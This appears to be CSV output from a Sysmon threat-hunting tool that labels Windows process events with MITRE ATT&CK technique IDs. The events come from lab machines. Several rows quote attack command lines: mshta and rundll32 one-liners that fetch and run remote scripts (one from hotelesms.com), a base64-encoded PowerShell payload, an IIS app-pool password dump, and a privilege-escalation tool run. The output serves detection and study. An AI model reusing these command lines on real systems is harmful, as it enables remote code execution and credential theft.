2020-10-23 21:58:21.693 + 747F3D96-51FD-5F93-0000-00103B425E00 + 7504 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51F9-5F93-0000-0010551E5E00 + 9116 + C:\Windows\SysWOW64\rundll32.exe + "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1218.005 ] Mshta found running in the system,1564435999.891564,2019-07-30T01:33:19.891564+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line (mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4904 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:18.451 + 747F3D96-661E-5D3F-0000-00107F248700 + 3164 + C:\Windows\System32\mshta.exe + 11.00.17763.1 (WinBuild.160101.0800) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close(); + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=DD8B22ACEA424823BB64ABF71F61A03D41177C38,MD5=F328FDCFF05BF02C2C986D52AED8BC2A,SHA256=E616C5CE71886652C13E2E1FA45A653B44D492B054F16B15A38418B8507F57C7,IMPHASH=42DA177DE2FAA97C3DFAEC9562772A7F + 747F3D96-661E-5D3F-0000-0010A3148700 + 776 + C:\Windows\System32\cmd.exe + cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close(); + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766818.050631,2020-03-21T09:00:18.050631+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243527 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.682 + 747F3D96-9F61-5E75-0000-001059841E00 + 8076 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1603490301.696651,2020-10-24T01:58:21.696651+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424175 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:21.693 + 747F3D96-51FD-5F93-0000-00103B425E00 + 7504 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51F9-5F93-0000-0010551E5E00 + 9116 + C:\Windows\SysWOW64\rundll32.exe + "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1558452777.867089,2019-05-21T19:32:57.867089+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4126 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 15:32:57.276 + 365ABB72-1A29-5CE4-0000-00107BE42101 + 2920 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-39CC-5CE3-0000-002096C70000 + 0xc796 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-1A29-5CE4-0000-001054E32101 + 1532 + C:\Windows\System32\cmd.exe + cmd.exe /C rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1170] Detecting Mshta,1564435999.891564,2019-07-30T01:33:19.891564+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line (mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4904 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:18.451 + 747F3D96-661E-5D3F-0000-00107F248700 + 3164 + C:\Windows\System32\mshta.exe + 11.00.17763.1 (WinBuild.160101.0800) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close(); + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=DD8B22ACEA424823BB64ABF71F61A03D41177C38,MD5=F328FDCFF05BF02C2C986D52AED8BC2A,SHA256=E616C5CE71886652C13E2E1FA45A653B44D492B054F16B15A38418B8507F57C7,IMPHASH=42DA177DE2FAA97C3DFAEC9562772A7F + 747F3D96-661E-5D3F-0000-0010A3148700 + 776 + C:\Windows\System32\cmd.exe + cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close(); + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766818.050631,2020-03-21T09:00:18.050631+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243527 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.682 + 747F3D96-9F61-5E75-0000-001059841E00 + 8076 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564845391.87585,2019-08-03T19:16:31.875850+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5536 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 15:16:31.676 + 747F3D96-A54F-5D45-0000-0010D83FA101 + 1716 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-A54F-5D45-0000-0010C429A101 + 6080 + C:\Windows\System32\dllhost.exe + C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1558452777.867089,2019-05-21T19:32:57.867089+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4126 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 15:32:57.276 + 365ABB72-1A29-5CE4-0000-00107BE42101 + 2920 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-39CC-5CE3-0000-002096C70000 + 0xc796 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-1A29-5CE4-0000-001054E32101 + 1532 + C:\Windows\System32\cmd.exe + cmd.exe /C rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1611667274.399477,2021-01-26T17:21:14.399477+04:00,,Threat,Critical,"Found User (LAPTOP-JU4M3I0E\bouss) run Suspicious PowerShell commands that include (powershell,.cmd) in event with Command Line (powershell.exe start-process notepad.exe) and Parent Image :C:\Windows\SysWOW64\cmd.exe , Parent CommandLine ("C:\windows\system32\cmd.exe" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd) in directory : ( C:\Users\bouss\source\repos\blabla\blabla\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 2429138 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2021-01-26 13:21:14.021 + 00247C92-174A-6010-0000-0010C0B2D92E + 18548 + C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe + 10.0.18362.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + PowerShell.EXE + powershell.exe start-process notepad.exe + C:\Users\bouss\source\repos\blabla\blabla\ + LAPTOP-JU4M3I0E\bouss + 00247C92-5082-600D-0000-0020A246F726 + 0x26f746a2 + 5 + Medium + SHA1=2223E8613BB0DD90888B17367007489FE16693E4,MD5=BCC5A6493E0641AA1E60CBF69469E579,SHA256=7762A4766BC394B4CB2D658144B207183FF23B3139181CD74E615DB63E6E57D6,IMPHASH=C6A0924236A2CDF364F3D2FAD87F702A + 00247C92-1749-6010-0000-0010EFAAD92E + 23168 + C:\Windows\SysWOW64\cmd.exe + "C:\windows\system32\cmd.exe" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766818.050631,2020-03-21T09:00:18.050631+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243527 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.682 + 747F3D96-9F61-5E75-0000-001059841E00 + 8076 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1602619902.353945,2020-10-14T00:11:42.353945+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\system32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 2196443 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2020-10-13 20:11:42.277 + 00247C92-09FE-5F86-0000-0010AD861401 + 7648 + C:\Windows\System32\cmd.exe + 10.0.18362.449 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + c:\windows\system32\cmd.exe + c:\Windows\System32\ + LAPTOP-JU4M3I0E\bouss + 00247C92-DE70-5F85-0000-002059F80600 + 0x6f859 + 1 + Medium + SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 00247C92-09FE-5F86-0000-001051841401 + 1716 + C:\Windows\System32\wuauclt.exe + wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1558452777.867089,2019-05-21T19:32:57.867089+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4126 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 15:32:57.276 + 365ABB72-1A29-5CE4-0000-00107BE42101 + 2920 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-39CC-5CE3-0000-002096C70000 + 0xc796 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-1A29-5CE4-0000-001054E32101 + 1532 + C:\Windows\System32\cmd.exe + cmd.exe /C rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.5225,2019-05-27T05:29:18.522500+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5928 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.472 + 365ABB72-3D6E-5CEB-0000-0010CC99FF00 + 344 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1611667274.399477,2021-01-26T17:21:14.399477+04:00,,Threat,High,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe start-process notepad.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 2429138 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2021-01-26 13:21:14.021 + 00247C92-174A-6010-0000-0010C0B2D92E + 18548 + C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe + 10.0.18362.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + PowerShell.EXE + powershell.exe start-process notepad.exe + C:\Users\bouss\source\repos\blabla\blabla\ + LAPTOP-JU4M3I0E\bouss + 00247C92-5082-600D-0000-0020A246F726 + 0x26f746a2 + 5 + Medium + SHA1=2223E8613BB0DD90888B17367007489FE16693E4,MD5=BCC5A6493E0641AA1E60CBF69469E579,SHA256=7762A4766BC394B4CB2D658144B207183FF23B3139181CD74E615DB63E6E57D6,IMPHASH=C6A0924236A2CDF364F3D2FAD87F702A + 00247C92-1749-6010-0000-0010EFAAD92E + 23168 + C:\Windows\SysWOW64\cmd.exe + "C:\windows\system32\cmd.exe" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( "C:\Windows\System32\schtasks.exe" /delete /tn elevator ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16249 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 00:32:40.164 + 365ABB72-69A8-5CD7-0000-0010C0982200 + 3792 + C:\Windows\System32\schtasks.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Manages scheduled tasks + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\schtasks.exe" /delete /tn elevator + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-5DEC-5CD7-0000-00204A380100 + 0x1384a + 1 + High + SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9 + 365ABB72-6998-5CD7-0000-00104E422200 + 2740 + C:\Python27\python.exe + python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558969965.49171,2019-05-27T19:12:45.491710+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl 